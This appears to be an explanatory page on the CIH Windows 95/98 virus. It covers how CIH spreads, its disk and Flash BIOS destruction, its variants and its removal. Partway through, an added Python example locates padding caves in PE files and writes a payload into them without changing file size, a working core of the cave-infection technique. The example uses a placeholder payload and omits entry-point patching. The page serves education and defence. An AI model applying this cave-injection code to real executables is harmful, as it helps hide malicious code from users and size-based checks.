CIH is a Windows 95/98 virus that has spread worldwide.
The virus spreads quietly and triggers on April 26th (another version triggers on the 26th of every month). It is considered highly destructive: on the trigger date it overwrites the hard drives and then attempts to overwrite the Flash BIOS.
Credit:
Information about the CIH virus is available at the McAfee Virus Information Center: http://vil.mcafee.com/vil/vfi_4251.asp
For information about AntiViral Toolkit Pro, visit: http://www.avp.com
CIH is a Windows 95/98 virus (it does not run on Windows 3.11, Windows NT or DOS). It was first posted on a conference site in Taiwan and quickly spread around the world. The virus body is about 1 KB, and it infects Windows PE executables (EXE files) as they are opened by the operating system.
The size of an infected file does not change, thanks to the way the virus is written. A portable executable (PE) file is made of sections whose on-disk size is rounded up to the file alignment, so the end of most sections contains unused, zero-filled padding (a "cave") between the last byte the section actually uses and the aligned section boundary. Instead of appending itself to the file as most infectors do, the virus splits its body into pieces small enough to fit into these caves and stores them there, so the file length and the section layout stay exactly as they were.
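The cave-filling described above, as an added example written for this page (it is not code from the article and not the virus's own code): it parses the PE section table, computes the slack at the end of each section, and splits a 1 KB placeholder payload across the caves so that the file length stays the same. The sample PE file and its section sizes are constructed inline; the alignment values, the payload bytes and the helper names are assumptions. Patching the entry point and recording where each chunk went, which a real infector also has to do, is deliberately left out.

```python
"""Find the padding ("caves") at the end of PE sections and split a
payload across them so that the file's length is unchanged.

Added example written for this page; not the article's code and not the
virus's own code.  The sample PE is constructed inline (build_sample_pe)
and the 1024-byte PAYLOAD is placeholder data standing in for the "1k"
virus body the page describes.
"""
import struct

FILE_ALIGNMENT = 0x200        # assumed file alignment of the sample PE
SECTION_ALIGNMENT = 0x1000    # assumed in-memory section alignment
HEADERS_SIZE = 0x200          # DOS stub + PE headers padded to one alignment unit
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = "<HHIIIHH"         # IMAGE_FILE_HEADER, 20 bytes


def build_sample_pe(sections):
    """Build a minimal PE32 file from (name, VirtualSize, SizeOfRawData) tuples.

    Each section's used bytes are filled with 0xCC; the padding up to its
    aligned SizeOfRawData is left zeroed, exactly as a linker leaves it.
    """
    opt = bytearray(224)                               # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)              # Magic = PE32
    struct.pack_into("<I", opt, 32, SECTION_ALIGNMENT)
    struct.pack_into("<I", opt, 36, FILE_ALIGNMENT)
    struct.pack_into("<I", opt, 60, HEADERS_SIZE)      # SizeOfHeaders
    nt = (b"PE\0\0"
          + struct.pack(COFF_HDR, 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
          + bytes(opt))

    image = bytearray(HEADERS_SIZE)
    image[:2] = b"MZ"
    e_lfanew = 0x80
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + len(nt)] = nt
    table = e_lfanew + len(nt)
    if table + 40 * len(sections) > HEADERS_SIZE:
        raise ValueError("too many sections for the fixed-size sample headers")

    raw_ptr, vaddr, body = HEADERS_SIZE, SECTION_ALIGNMENT, bytearray()
    for i, (name, vsize, rsize) in enumerate(sections):
        if rsize % FILE_ALIGNMENT or vsize > rsize:
            raise ValueError("sample sections must be aligned and fully backed on disk")
        hdr = struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"), vsize, vaddr,
                          rsize, raw_ptr, 0, 0, 0, 0, 0x60000020)
        image[table + 40 * i:table + 40 * (i + 1)] = hdr
        body += b"\xCC" * vsize + b"\0" * (rsize - vsize)
        raw_ptr += rsize
        vaddr += -(-vsize // SECTION_ALIGNMENT) * SECTION_ALIGNMENT   # round up
    return bytes(image + body)


def section_caves(data):
    """Return (name, file offset of the cave, cave size) for every section.

    The cave is the slack between the bytes a section really uses
    (VirtualSize) and its aligned on-disk size (SizeOfRawData).
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, data, coff)
    table = coff + 20 + opt_size
    caves = []
    for i in range(nsect):
        name, vsize, _va, rsize, rptr, *_ = struct.unpack_from(SECTION_HDR, data, table + 40 * i)
        used = min(vsize, rsize)             # a .bss-style section has no slack on disk
        caves.append((name.rstrip(b"\0").decode(), rptr + used, rsize - used))
    return caves


def plan_cave_infection(data, payload_len, min_chunk=16):
    """Greedily split payload_len bytes over the caves that are really empty.

    Returns [(file_offset, length)] or None if the caves cannot hold it.
    A cave is skipped when it is too small to be worth a chunk, or when it
    already holds non-zero bytes (an overlay, or a previous infection).
    """
    plan, remaining = [], payload_len
    for _name, off, size in section_caves(data):
        if remaining == 0:
            break
        if size < min_chunk or any(data[off:off + size]):
            continue
        take = min(size, remaining)
        plan.append((off, take))
        remaining -= take
    return plan if remaining == 0 else None


def write_into_caves(data, payload, plan):
    """Copy the payload chunks into the planned caves; len(result) == len(data)."""
    if sum(n for _, n in plan) != len(payload):
        raise ValueError("plan does not cover the payload")
    out, pos = bytearray(data), 0
    for off, length in plan:
        out[off:off + length] = payload[pos:pos + length]
        pos += length
    return bytes(out)


# Constructed sample: three sections with 460, 384 and 256 bytes of slack
# (1100 bytes in total), enough for a 1 KB body split three ways.
SAMPLE_PE = build_sample_pe([(".text", 0x1234, 0x1400),
                             (".rdata", 0x80, 0x200),
                             (".data", 0x300, 0x400)])
PAYLOAD = bytes(range(256)) * 4        # 1024 placeholder bytes, not virus code

if __name__ == "__main__":
    for name, off, size in section_caves(SAMPLE_PE):
        print(f"{name:8s} cave at 0x{off:05X}, {size} bytes")
    plan = plan_cave_infection(SAMPLE_PE, len(PAYLOAD))
    infected = write_into_caves(SAMPLE_PE, PAYLOAD, plan)
    print("chunks:", plan, "size before/after:", len(SAMPLE_PE), len(infected))
```

Two things worth noticing in the output: the 1 KB payload lands as three chunks (460 + 384 + 180 bytes) and the file is still exactly 0x1C00 bytes long, which is why a file-size comparison, or a backup that only looks at directory entries, never notices this kind of infection; a checksum over the whole file does change, and that is what a file integrity checker has to rely on. The scan for non-zero bytes before a cave is used is the practical safeguard: header arithmetic alone would happily "re-use" a cave that already holds data.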
When an infected executable is run, the virus loads itself into memory and escalates from Ring 3 (the privilege level where ordinary applications execute) to Ring 0 (the level where privileged operating system code runs), a trick that works because Windows 95/98 does not protect its kernel from user-mode code the way Windows NT does. Once in Ring 0 it hooks the file-open routines, so every executable opened from then on is infected as well.
When the trigger date arrives, the virus overwrites the start of every hard drive in the system, beginning at sector 0, using direct disk writes rather than BIOS calls. This destroys the partition table, boot sectors and file allocation tables, which makes everything on the drives unreachable without specialist recovery, and it bypasses the BIOS "virus protection" setting, which only guards BIOS-level writes to the boot sector and master boot record. After the drives are overwritten, the virus tries to reprogram the Flash BIOS with garbage; this succeeds on many motherboards of the time, since their flash chips can be written from software unless a write-protect jumper is set.
The result of this attack is a computer that no longer boots, with all of its data gone; if the BIOS overwrite succeeded, the machine will not even get through its power-on self test.
Two main versions of the virus have been found "in the wild". The first, CIH 1.2, triggers on April 26th. The second, CIH 1.4 (sometimes referred to as TATUNG, after a string inside the virus), triggers on the 26th of every month. A third, less common variant, CIH 1.3, triggers on June 26th.
Most recent anti-virus applications detect and remove CIH. Central Command Inc. offers a special version of AntiViral Toolkit Pro, called AVPLite, that detects and cleans CIH.
To use it, download the toolkit from: ftp://ftp.avp.com/pub/nocih/nocih.exe (CIH will not infect this file). Then insert a blank, formatted diskette into your floppy drive and, at a DOS prompt, type:
Nocih.exe a: (where a: is the floppy drive).
Now make the diskette bootable by typing:
sys a:
Then copy the file HIMEM.SYS to the floppy by typing:
copy c:\windows\himem.sys a:
Now write-protect the diskette (so the scanner disk itself cannot be infected), power down the machine and power it up again with the diskette in the floppy drive. The machine boots from the clean diskette, so the virus is not resident in memory while the hard drives are scanned; if the machine boots from the hard drive instead, change the BIOS boot order so the floppy drive is tried first.